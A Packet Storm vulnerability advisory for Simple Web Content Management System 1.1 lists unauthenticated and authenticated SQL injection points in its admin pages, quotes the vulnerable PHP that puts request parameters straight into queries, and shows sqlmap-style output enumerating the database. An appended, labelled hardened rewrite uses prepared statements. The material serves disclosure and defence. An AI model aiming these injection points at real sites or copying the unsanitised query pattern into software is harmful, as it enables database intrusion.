Simple Web Content Management System 1.1 SQL Injection

2012-06-01T00:00:00
ID PACKETSTORM:113179
Type packetstorm
Reporter loneferret
Modified 2012-06-01T00:00:00

Description

                                        
                                            `######################################################################################  
# Exploit Title: Simple Web Content Management System SQL Injection  
# Date: May 30th 2012  
# Author: loneferret  
# Version: 1.1  
# Application Url: http://www.cms-center.com/  
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23  
######################################################################################  
# Discovered by: loneferret  
######################################################################################  
  
# Side note:  
# This application is nothing fancy, and really shouldn't be used other than  
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable  
# parameter.  
  
# Vulnerability:  
# Due to improper input sanitization, many parameters are prone to SQL injection.  
# Most of them require being authenticated with an (admin) account,  
# but a few pages will produce an error without having to log on.  
  
  
# PoC 1:  
# No Authentication Required.  
# Page: /admin/item_delete.php?id=[SQLi]  
# Vulnerable Parameter: id  
# Code:  
15 $id = $_GET['id'];  
16 $title = NULL;  
17 $text = NULL;  
18 database_connect();  
19 $query = "select title,text from content where id = $id;";  
20 //echo $query;  
21 $result = mysql_query($query);  
  
# As stated, nothing is checked before passing "id" to MySql.  
# This results in a MySql error.  
  
  
  
# PoC 2:  
# No Authentication Required.  
# Page: /admin/item_status.php?id=[SQLi]&status=1  
# Page: /admin/item_status.php?id=1&status=[SQLi]  
# Vulnerable Parameter: id & status  
# Code:  
10 $ref = $_GET['ref'];  
11 $id = $_GET['id'];  
12 $status = $_GET['status'];  
13 $update = "UPDATE content  
14 SET status='$status'  
15 WHERE id='$id'";  
16 $query = mysql_query($update)  
or die("Their was a problem updating the status: ". mysql_error());  
  
# As stated, nothing is checked before passing "id" and/or "status" to MySql.  
# This results in a MySql error.  
  
  
  
# PoC 3:  
# Authentication Required.  
# Page: /admin/item_detail.php?id=[SQLi]  
# Vulnerable Parameter: id  
# Code:  
15 $id = $_GET['id'];  
16 $title = NULL;  
17 $text = NULL;  
18 database_connect();  
19 $query = "select title,text from content where id = $id;";  
20 //echo $query;  
21 $result = mysql_query($query);  
  
# As stated, nothing is checked before passing "id" to MySql.  
# This results in a MySql error.  
  
  
# PoC 4:  
# Authentication Required.  
# Page: /admin/item_modify.php?id=[SQLi]  
# Vulnerable Parameter: id  
# Code:  
60 database_connect();   
61 if(isset($_GET['id'])) {  
62 $id = ($_GET['id']);  
63 }  
64 $select = "SELECT *  
65 FROM content  
66 where id = '$id'";  
67 $query = mysql_query($select);  
  
# As stated, nothing is checked before passing "id" to MySql.  
# This results in a MySql error.  
  
# PoC 6:  
# Authentication Required.  
# Page: /admin/item_position.php?id=[SQLi]&mode=up  
# Vulnerable Parameter: id  
.  
...ok I think we get the idea now.  
.  
.  
#   
# Example output:  
#  
[19:40:22] [INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL 5.0  
[19:40:22] [INFO] fetching tables for database: phpcms  
[19:40:22] [INFO] heuristics detected web page charset 'ascii'  
[19:40:22] [INFO] the SQL query used returns 1 entries  
[19:40:22] [INFO] retrieved: content  
Database: phpcms  
[1 table]  
+---------+  
| content |  
+---------+  
  
`
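As an added example (not the advisory's or the CMS's code), here is the item_status.php and item_delete.php logic from the PoCs rewritten with integer validation and mysqli prepared statements, the fix that the "improper input sanitization" described above calls for; the mysql_* functions the CMS uses were removed in PHP 7. Table and column names come from the quoted snippets; the function names, the placeholder credentials and treating status as an integer flag (as in the PoC URL status=1) are assumptions.

```php
<?php
// Added example (not the CMS's or the advisory's code): hardened replacements for
// the item_status.php and item_delete.php queries quoted above. Table and column
// names come from the advisory; function names, credentials and the treatment of
// status as an integer flag (status=1 in the PoC URL) are assumptions.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // failures throw mysqli_sql_exception

// Accept only a non-negative integer: "1'" or "1 OR 1=1" never reach the query.
function validated_int(array $params, string $name): ?int {
    $v = filter_var($params[$name] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $v === false ? null : $v;
}

// UPDATE from item_status.php: the SQL text is fixed and the values are bound
// parameters, so nothing the client sends can change the statement's structure.
function update_status(mysqli $db, int $id, int $status): int {
    $stmt = $db->prepare('UPDATE content SET status = ? WHERE id = ?');
    $stmt->bind_param('ii', $status, $id);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

// SELECT from item_delete.php / item_detail.php, same pattern; null if no such row.
function fetch_item(mysqli $db, int $id): ?array {
    $stmt = $db->prepare('SELECT title, text FROM content WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->store_result();                 // buffer TEXT columns before binding
    $stmt->bind_result($title, $text);
    $row = $stmt->fetch() ? ['title' => $title, 'text' => $text] : null;
    $stmt->close();
    return $row;
}

// Request handling: malformed input gets a 400, an unknown id a 404, and database
// failures surface as exceptions instead of echoed mysql_error() text.
$id = validated_int($_GET, 'id');
$status = validated_int($_GET, 'status');
if ($id === null || $status === null) {
    http_response_code(400);
    exit('invalid parameters');
}
$db = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'phpcms'); // placeholder credentials
if (fetch_item($db, $id) === null) {
    http_response_code(404);
    exit('no such item');
}
printf("%d row(s) updated\n", update_status($db, $id, $status));
```

Because validated_int also returns null for array-valued parameters (id[]=1) and empty strings, the 400 branch covers those cases as well, not just quote-bearing input.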